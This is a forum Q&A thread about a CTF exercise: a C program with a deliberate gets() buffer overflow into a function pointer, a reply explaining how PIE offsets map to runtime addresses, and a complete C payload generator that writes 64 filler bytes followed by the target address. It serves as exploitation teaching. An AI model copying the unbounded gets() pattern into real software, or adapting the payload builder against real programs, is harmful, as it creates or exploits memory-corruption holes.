Reputation: 88
I am currently completing a CTF exercise where I must attempt to overwrite a function pointer on the stack through a buffer overflow. Here is the code:
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char *gets(char *);   /* gets() is no longer declared by modern headers; declared by hand so the file compiles */

void complete_level() {
    printf("Congratulations, you've finished :-) Well done!\n");
    exit(0);
}

int main(int argc, char **argv) {
    struct {
        char buffer[64];          /* filled by gets() with no bounds check */
        volatile int (*fp)();     /* sits directly after buffer in the struct */
    } locals;

    locals.fp = NULL;
    gets(locals.buffer);          /* more than 64 bytes of input spill into fp */

    if (locals.fp) {
        printf("calling function pointer @ %p\n", locals.fp);
        fflush(stdout);
        locals.fp();
    } else {
        printf("function pointer remains unmodified :~( better luck next time!\n");
    }
    exit(0);
}
The code will get input using the vulnerable gets() function and store it inside the buffer called buffer.

Since buffer is the largest variable in the struct, it will allow me to overwrite variables below it on the stack. The next variable is the function pointer called fp.

In order to overwrite fp (and make it point to complete_level) I will need to find the address of the complete_level function in memory. Then write "A" 64 times, then write the function's address.

The problem I have is that I cannot find the address of the function.
So far I have tried objdump; however, that gives me an offset and not the full address:

objdump -M intel -d 3 | grep complete_level
    1184: 80 3d 8d 2e 00 00 00 cmp BYTE PTR [rip+0x2e8d],0x0 # 4018 <completed.0>
    11ac: c6 05 65 2e 00 00 01 mov BYTE PTR [rip+0x2e65],0x1 # 4018 <completed.0>
00000000000011c9 <complete_level>:
Here is the output of the executable under the file command:
3: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV),
dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2,
BuildID[sha1]=11a5f76e0d40b7f4fdc53d4dd60faac9f9e405be, for GNU/Linux 3.2.0, not stripped
Why is it not showing the full address? Also, how can I get the full address of the function complete_level?
Upvotes: 0
Views: 1263
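The `file` output above already explains the missing address: the binary is a "pie executable", so objdump can only print offsets from the start of the ELF image. At run time the loader maps the whole image at a page-aligned base, and complete_level lives at base + 0x11c9 (the low twelve bits, 0x1c9, never change; only the upper bits move with ASLR). The base can be read from the first line of /proc/<pid>/maps of a running copy, or from `info proc mappings` in gdb, and with ASLR switched off (gdb does this by default; `setarch x86_64 -R ./3` does it outside gdb) it stays the same from one run to the next. The following program is an added example, not code from the question or the CTF, that parses such a maps line, adds the objdump offset from the listing above, and writes the 64-byte filler plus the little-endian address that the question's struct layout calls for (fp sits at offset 64, since 64 is already 8-byte aligned). The maps line in main() is constructed; 0x555555554000 is the base usually seen for x86-64 PIEs with ASLR disabled, but it is an assumption here, not something taken from the post.

```c
/* Added example (not part of the original post): compute the run-time
 * address of complete_level in a PIE binary and emit the overflow payload.
 * Build: gcc -O2 -o gen gen.c
 * Use:   ./gen | setarch x86_64 -R ./3     (ASLR off, so the base is stable)
 */
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Offset of complete_level inside the ELF, taken from the objdump listing
 * in the question (00000000000011c9 <complete_level>). */
#define COMPLETE_LEVEL_OFFSET 0x11c9UL

/* Layout of the question's `locals` struct: a 64-byte buffer followed by an
 * 8-byte function pointer. 64 is already 8-aligned, so there is no padding. */
#define BUFFER_SIZE 64
#define PAYLOAD_SIZE (BUFFER_SIZE + sizeof(uintptr_t))

/* Parse the start address of a /proc/<pid>/maps line such as
 * "555555554000-555555555000 r--p 00000000 08:01 1234 /home/user/3".
 * The executable's first mapping (file offset 00000000) starts at the load
 * base that every objdump offset must be added to. Returns 0 on parse failure. */
uintptr_t parse_map_base(const char *maps_line)
{
    char *end = NULL;
    unsigned long long start = strtoull(maps_line, &end, 16);
    if (end == maps_line || *end != '-')
        return 0;
    return (uintptr_t)start;
}

/* A PIE is loaded at a page-aligned base, so the low 12 bits of the objdump
 * offset survive unchanged (...1c9) and only the upper bits differ per run. */
uintptr_t runtime_address(uintptr_t base, uintptr_t file_offset)
{
    return base + file_offset;
}

/* Fill `out` with 64 filler bytes followed by the target address in
 * little-endian byte order (x86-64). Returns the payload length,
 * or 0 if `out` is too small to hold it. */
size_t build_payload(uint8_t *out, size_t outlen, uintptr_t target)
{
    if (outlen < PAYLOAD_SIZE)
        return 0;
    memset(out, 'A', BUFFER_SIZE);
    for (size_t i = 0; i < sizeof(uintptr_t); i++)
        out[BUFFER_SIZE + i] = (uint8_t)(target >> (8 * i));
    return PAYLOAD_SIZE;
}

int main(void)
{
    /* Constructed sample line (assumption, not from the post): what the first
     * /proc/<pid>/maps entry of the target looks like with ASLR disabled. */
    const char *maps_line =
        "555555554000-555555555000 r--p 00000000 08:01 1234 /home/user/3";

    uintptr_t base = parse_map_base(maps_line);
    if (base == 0) {
        fprintf(stderr, "could not parse maps line\n");
        return 1;
    }
    uintptr_t target = runtime_address(base, COMPLETE_LEVEL_OFFSET);
    fprintf(stderr, "base %#" PRIxPTR " + offset %#lx = complete_level @ %#" PRIxPTR "\n",
            base, COMPLETE_LEVEL_OFFSET, target);

    uint8_t payload[PAYLOAD_SIZE];
    size_t n = build_payload(payload, sizeof payload, target);
    /* Raw bytes on stdout, no trailing newline needed: gets() stops at '\n'
     * or EOF, and it happily copies the NUL bytes inside the address. */
    fwrite(payload, 1, n, stdout);
    return 0;
}
```

With ASLR enabled, the base printed on stderr is only valid for the process whose maps line you parsed, so the payload must be fed to that same process (or the base re-read for every run). Inside gdb you can skip the arithmetic entirely: once the process has started (for example after `break main` and `run`), `p complete_level` prints the already-relocated address, and the value the target echoes back in "calling function pointer @ %p" lets you confirm which bytes landed in fp.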
Reputation: 139
Just use gdb and crack it like I did here.
Look at registers closely and see what moves where, when calls happen, etc.
Upvotes: 0